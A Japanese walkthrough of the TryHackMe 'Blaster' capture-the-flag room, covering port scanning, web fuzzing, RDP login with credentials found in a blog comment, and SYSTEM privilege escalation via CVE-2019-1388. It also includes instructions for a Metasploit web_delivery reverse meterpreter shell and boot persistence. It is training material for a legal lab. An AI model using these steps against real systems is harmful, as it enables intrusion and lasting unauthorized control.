[TryHackMe] Blaster - Walkthrough -
本稿では、TryHackMeにて提供されている「Blaster」ルームに関する攻略方法(Walkthrough)について検証します。
「Blaster」は「free room」(無料)で提供されています。購読を必要とせずに仮想マシンを「展開(Deploy)」することができます。
[Task 1] – Mission Start!
Task 1 - #1.
Deploy the machine! This is a Windows box so give it a few minutes (3-5 at max) to come online
Deploy the machine! This is a Windows box so give it a few minutes (3-5 at max) to come online
本問は解答が必要ありません。
はじめに、[Deploy]ボタンをクリックし、課題となっているマシンを起動します。
[Task 2] – Activate Forward Scanners and Launch Proton Torpedoes
Task 2 - #1
How many ports are open on our target system?
How many ports are open on our target system?
blaster.thmにおいて、何件のポートがオープン状態となっているのか調査する課題です。
IPアドレス 10.10.106.91をblaster.thmとして、/etc/hostsに追加します。その上で、nmapを使用し、ポートスキャンを実行します。
kali@kali:~$ nmap -Pn -T4 -A -v blaster.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:06
Completed NSE at 21:06, 0.00s elapsed
Initiating NSE at 21:06
Completed NSE at 21:06, 0.00s elapsed
Initiating NSE at 21:06
Completed NSE at 21:06, 0.00s elapsed
Initiating Connect Scan at 21:06
Scanning blaster.thm (10.10.106.91) [1000 ports]
Discovered open port 139/tcp on 10.10.106.91
Discovered open port 445/tcp on 10.10.106.91
Discovered open port 3389/tcp on 10.10.106.91
Discovered open port 135/tcp on 10.10.106.91
Discovered open port 80/tcp on 10.10.106.91
Discovered open port 3306/tcp on 10.10.106.91
Increasing send delay for 10.10.106.91 from 0 to 5 due to 213 out of 532 dropped probes since last increase.
Increasing send delay for 10.10.106.91 from 5 to 10 due to max_successful_tryno increase to 5
Completed Connect Scan at 21:06, 31.15s elapsed (1000 total ports)
Initiating Service scan at 21:06
Scanning 6 services on blaster.thm (10.10.106.91)
Completed Service scan at 21:08, 101.65s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.106.91.
Initiating NSE at 21:08
Completed NSE at 21:08, 10.12s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 1.79s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Nmap scan report for blaster.thm (10.10.106.91)
Host is up (0.29s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2020-09-25T01:08:15+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Issuer: commonName=RetroWeb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-21T21:44:38
| Not valid after: 2020-11-20T21:44:38
| MD5: dc1a 219e aee5 c428 1a53 5c03 7a4c 9a6f
|_SHA-1: b359 f8c9 6c31 2619 957a a417 78fa 8347 c1d8 7da7
|_ssl-date: 2020-09-25T01:08:24+00:00; -1s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-25T01:08:16
|_ start_date: 2020-09-25T00:53:24
NSE: Script Post-scanning.
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.63 seconds
Task 2 - #2.
Looks like there's a web server running, what is the title of the page we discover when browsing to it?
blaster.thmのウェブサイトに設定されたtitleについて調査する課題です。
Firefoxブラウザを使って、blaster.thmの80/tcpにアクセスしてみます。
なお、nmapコマンドのhttp-title:結果から本問を解答することも可能です。
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
Task 2 - #3.
Interesting, let's see if there's anything else on this web server by fuzzing it. What hidden directory do we discover?
blaster.thmのウェブサイトに設定された隠しページについて調査する課題です。
wfuzzコマンドを使って、blaster.thmの80/tcpに対してファジングを行います。
kali@kali:~$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://blaster.thm/FUZZ --hc 404,403 -t 100
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://blaster.thm/FUZZ
Total requests: 20473
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000015426: 301 1 L 10 W 149 Ch "retro"
Total time: 177.6230
Processed Requests: 20473
Filtered Requests: 20472
Requests/sec.: 115.2609
Task 2 - #4.
Navigate to our discovered hidden directory, what potential username do we discover?
ユーザー名と推定される情報について調査する課題です。
Firefoxブラウザを使って、「TASK 2 - #3」にて列挙されたディレクトリにアクセスします。
ブログ形式のサイトから、投稿者名を特定することができました。
Task 2 - #5.
Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?
パスワードと推定される情報について調査する課題です。
「Ready Player One」に関する記事のコメントにて、次の記載が確認できます。
Leaving myself a note here just in case I forget how to spell it: parzival
Task 2 - #6.
Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are it's contents?
「Microsoftリモートデスクトップ(MSRDP)」を介してblaster.thmにログインし、user.textフラグを取得する課題です。
remmina(リモートデスクトップクライアント)ソフトウェアをインストールします。
kali@kali:~$ sudo apt-get install remmina
wade:parzivalアカウントを使用し、blaster.thmのRDPにアクセスしてみます。
デスクトップ上にuser.txtファイルが確認できます。
コマンドプロンプトにて確認したところ、デスクトップ上のファイルは正確には「user.txt.txt」ファイルでした。
C:\Users\Wade\Desktop>type user.txt.txt
{BLOCKED}
systeminfoコマンドにて、システムの詳細情報を取得しておきます。
C:\Users\Wade>systeminfo
Host Name: RETROWEB
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: {BLOCKED}
Original Install Date: 12/8/2019, 10:50:43 PM
System Boot Time: 9/24/2020, 5:49:22 PM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version: Xen 4.2.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 512 MB
Available Physical Memory: 92 MB
Virtual Memory: Max Size: 1,182 MB
Virtual Memory: Available: 184 MB
Virtual Memory: In Use: 998 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\RETROWEB
Hotfix(s): 1 Hotfix(s) Installed.
[01]: KB3192137
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.10.0.1
IP address(es)
[01]: 10.10.106.91
[02]: fe80::c993:9bcc:9861:1fd2
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
[Task 3] – Breaching the Control Room.
Task 3 - #1.
When enumerating a machine, it's often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?
When enumerating a machine, it's often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?
???
Windows証明書ダイアログに関する権限昇格の脆弱性です。この脆弱性により、攻撃者が権限をNT AUTHORITY \ SYSTEMに昇格させことが可能です。
- 参考動画, Zero Day Initiative 「CVE-2019-1388: Windows Privilege Escalation Through UAC」
Task 3 - #2.
Looks like an executable file is necessary for exploitation of this vulnerability and the user didn't really clean up very well after testing it. What is the name of this executable?
「Recycle Bin」の内容を確認します。復元し、#3、#4の解答に備えます。
Task 3 - #3.
Research vulnerability and how to exploit it. Exploit it now to gain an elevated terminal!
本問は解答が必要ありません。
Task 3 - #4.
Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?
- 復元した
hhupd.exeファイルを管理者として実行します(右クリック->Run as administrator)。
-
User Account Controlウインドウが表示されます。Show more detailsリンクをクリックします。
-
Show information about the publisher's certificateリンクをクリックします。
-
VeriSign Commercial Software Publishers CAリンクをクリックします。
-
File>Save as...を選択します。
- 「
Location is not available」エラーが発生しています。
- 「ファイル名」フィールドに「
c:\Windows\System32\*.*」を入力します。
- 「
cmd.exe」を選択します。右クリックし、Openを選択します。
-
NT AUTHORITY \ SYSTEMへの昇格が成功しました。
Task 3 - #5.
Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!
Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\System32>whoami nt authority\system C:\Windows\System32>cd \ C:\>cd Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt {BLOCKED}[Task 4] – Adoption into the Collective
Task 4 - #1.
Launch Metasploit now and select 'exploit/multi/script/web_delivery' for use.
本問は解答が必要ありません。
Task 4 - #2.
First, let's set the target to PSH (PowerShell). Which target number is PSH?
Task 4 - #3.
After setting your payload, set your lhost and lport accordingly such that you know which port the MSF web server is going to run on and that it'll be running on the TryHackMe network.
本問は解答が必要ありません。
Task 4 - #4.
Finally, let's set our payload. In this case, we'll be using a simple reverse HTTP payload. Do this now with the command: 'set payload windows/meterpreter/reverse_http'. Following this, launch the attack as a job with the command 'run -j'.
本問は解答が必要ありません。
Task 4 - #5.
Return to the terminal we spawned with our exploit. In this terminal, paste the command output by Metasploit after the job was launched. In this case, I've found it particularly helpful to host a simple python web server (python3 -m http.server) and host the command in a text file as copy and paste between the machines won't always work. Once you've run this command, return to our attacker machine and note that our reverse shell has spawned.
本問は解答が必要ありません。
Task 4 - #6.
Last but certainly not least, let's look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don't include anything beyond the base command and the option for boot startup.
Task 4 - #7.
Run this command now with options that allow it to connect back to your host machine should the system reboot. Note, you'll need to create a listener via the handler exploit to allow for this remote connection in actual practice. Congrats, you've now gain full control over the remote host and have established persistence for further operations!
本問は解答が必要ありません。
Author And Source
この問題について([TryHackMe] Blaster - Walkthrough -), 我々は、より多くの情報をここで見つけました https://qiita.com/v_avenger/items/5fb56968bac9e87b4983著者帰属:元の著者の情報は、元のURLに含まれています。著作権は原作者に属する。
Content is automatically searched and collected through network algorithms . If there is a violation . Please contact us . We will adjust (correct author information ,or delete content ) as soon as possible .